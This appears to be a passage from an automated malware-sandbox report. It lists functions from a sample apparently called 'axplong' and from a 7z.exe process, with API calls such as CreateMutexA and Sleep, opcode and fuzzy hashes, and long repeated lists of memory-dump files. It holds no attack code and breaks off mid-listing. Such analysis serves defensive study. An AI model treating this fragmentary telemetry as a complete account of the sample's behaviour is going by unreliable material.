Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: f0f8fa5f14c5a06959b6da36b3369a6daf634053243d11301870ef7168f5b6fa
Instruction ID: 476107ec74f777a03b8b2b5eb5e9998d8d29700c92ddcb6d47093c3450482bdf
Opcode Fuzzy Hash: f0f8fa5f14c5a06959b6da36b3369a6daf634053243d11301870ef7168f5b6fa
Instruction Fuzzy Hash: 27316671B00140DBEF0CDBB8DC897ADB763AF86310F24866CE0509B7E5C73989819792

Function 00639A0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 7bf69285bf76868176c141219b7e771a1602aac89d944de2d91e0ca67f2f0f30
Instruction ID: 652e9f2cc6faddc95b913ca78f60ab3dfc0fcf60e0b9ac3a7ee4795faa2abb26
Opcode Fuzzy Hash: 7bf69285bf76868176c141219b7e771a1602aac89d944de2d91e0ca67f2f0f30
Instruction Fuzzy Hash: 672176717142009BEB1C9B68EC8976DB767EFC6310F20432DE4548BBE5DB7589828792

Function 0063A27F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: a282781b700f0de49f719b5809eb82550504ff6c4b4da3b1c58166dc434f8c72
Instruction ID: 263ab7cc99a1008f73719dacfa58ce1bbd9deea71a64665f518b2b4a8edde47a
Opcode Fuzzy Hash: a282781b700f0de49f719b5809eb82550504ff6c4b4da3b1c58166dc434f8c72
Instruction Fuzzy Hash: 2A217C317102019BEB1CDBA8DC8876DB763EFC5310F24022DE445DB7E5CB3556819392

Function 0063A786 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: b2581c7f1509646b3c0c7a80c2de7125be6fa2964579686d45b73ff8e69cba01
Instruction ID: 6322cb19ce10701976791ba916bb6595bd341e746fb07350d40710dbcdae649c
Opcode Fuzzy Hash: b2581c7f1509646b3c0c7a80c2de7125be6fa2964579686d45b73ff8e69cba01
Instruction Fuzzy Hash: B6214F717481055BEF2867E8988A77D72739FD2700F204929E441D67D2CB75494192E7

Function 0066D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0066A6D3,00000001,00000364,00000006,000000FF,?,0066ECFF,?,00000004,00000000,?,?), ref: 0066D730

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ba11ed120c614318ede5d72f987dd8593223260e1832494ffcfcf2b134f1e93
Instruction ID: 568bbfe685d9a711165532440922425fcaf5c8f358ebe71a20bae3397da408e2
Opcode Fuzzy Hash: 1ba11ed120c614318ede5d72f987dd8593223260e1832494ffcfcf2b134f1e93
Instruction Fuzzy Hash: 98F0E231F4623466DB212F269D01B9B3F8B9F917B0B298116AC04AA281CE21DC0043F3

Analysis Process: 7z.exePID: 908, Parent PID: 9200COMMON

Executed Functions

Function 00B98817 Relevance: 130.3, APIs: 62, Strings: 12, Instructions: 780COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B98826
GetStdHandle.KERNEL32 ref: 00B9887D
GetConsoleScreenBufferInfo.KERNELBASE ref: 00B9888E
_CxxThrowException.MSVCRT ref: 00B989BD

Strings

, xrefs: 00B98FD6
7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00B9881F
offset=, xrefs: 00B98ECF
Hashers:, xrefs: 00B992B6
Can't load module: , xrefs: 00B98A04
7-Zip cannot find the code that works with archives., xrefs: 00B98A54
KSNFMGOPBELH, xrefs: 00B98CDC, 00B98D4A
Formats:, xrefs: 00B98CC7
|| , xrefs: 00B98F0B
Unsupported archive type, xrefs: 00B98AAD, 00B98BB8
Libs:, xrefs: 00B98C5B
Codecs:, xrefs: 00B9903E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
API String ID: 3442115484-272389550
Opcode ID: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
Instruction ID: 9ba308a7af038544f2cc3d8d9f7ff6dd7c1018bd8f7bb6811b480c35120c5073
Opcode Fuzzy Hash: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
Instruction Fuzzy Hash: AB72A172308A8196DF74EF25E4903AE73A1F789B81F409166DB9A47768DF3CC459CB40

Function 00B724C0 Relevance: 102.2, APIs: 81, Instructions: 981COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B726E4
free.MSVCRT ref: 00B726EF
free.MSVCRT ref: 00B7274F
free.MSVCRT ref: 00B7275A
free.MSVCRT ref: 00B727FF
free.MSVCRT ref: 00B72807
free.MSVCRT ref: 00B72818
free.MSVCRT ref: 00B72826
free.MSVCRT ref: 00B72831
free.MSVCRT ref: 00B72869
free.MSVCRT ref: 00B72871
free.MSVCRT ref: 00B72882
free.MSVCRT ref: 00B72951
free.MSVCRT ref: 00B7295C
free.MSVCRT ref: 00B72A36
free.MSVCRT ref: 00B72A3E
free.MSVCRT ref: 00B72A52
free.MSVCRT ref: 00B72A6C
free.MSVCRT ref: 00B72A77
free.MSVCRT ref: 00B72B8F
free.MSVCRT ref: 00B72B97
free.MSVCRT ref: 00B72BA8
free.MSVCRT ref: 00B72BB6
free.MSVCRT ref: 00B72BC1
free.MSVCRT ref: 00B72C12
free.MSVCRT ref: 00B72C1D
free.MSVCRT ref: 00B72C30
free.MSVCRT ref: 00B72C3B
free.MSVCRT ref: 00B72C4E
free.MSVCRT ref: 00B72C59
free.MSVCRT ref: 00B72C6C
free.MSVCRT ref: 00B72C77
free.MSVCRT ref: 00B72CA7
free.MSVCRT ref: 00B72CAF
free.MSVCRT ref: 00B72CBB
free.MSVCRT ref: 00B72CC9
free.MSVCRT ref: 00B72CD4
free.MSVCRT ref: 00B72D10
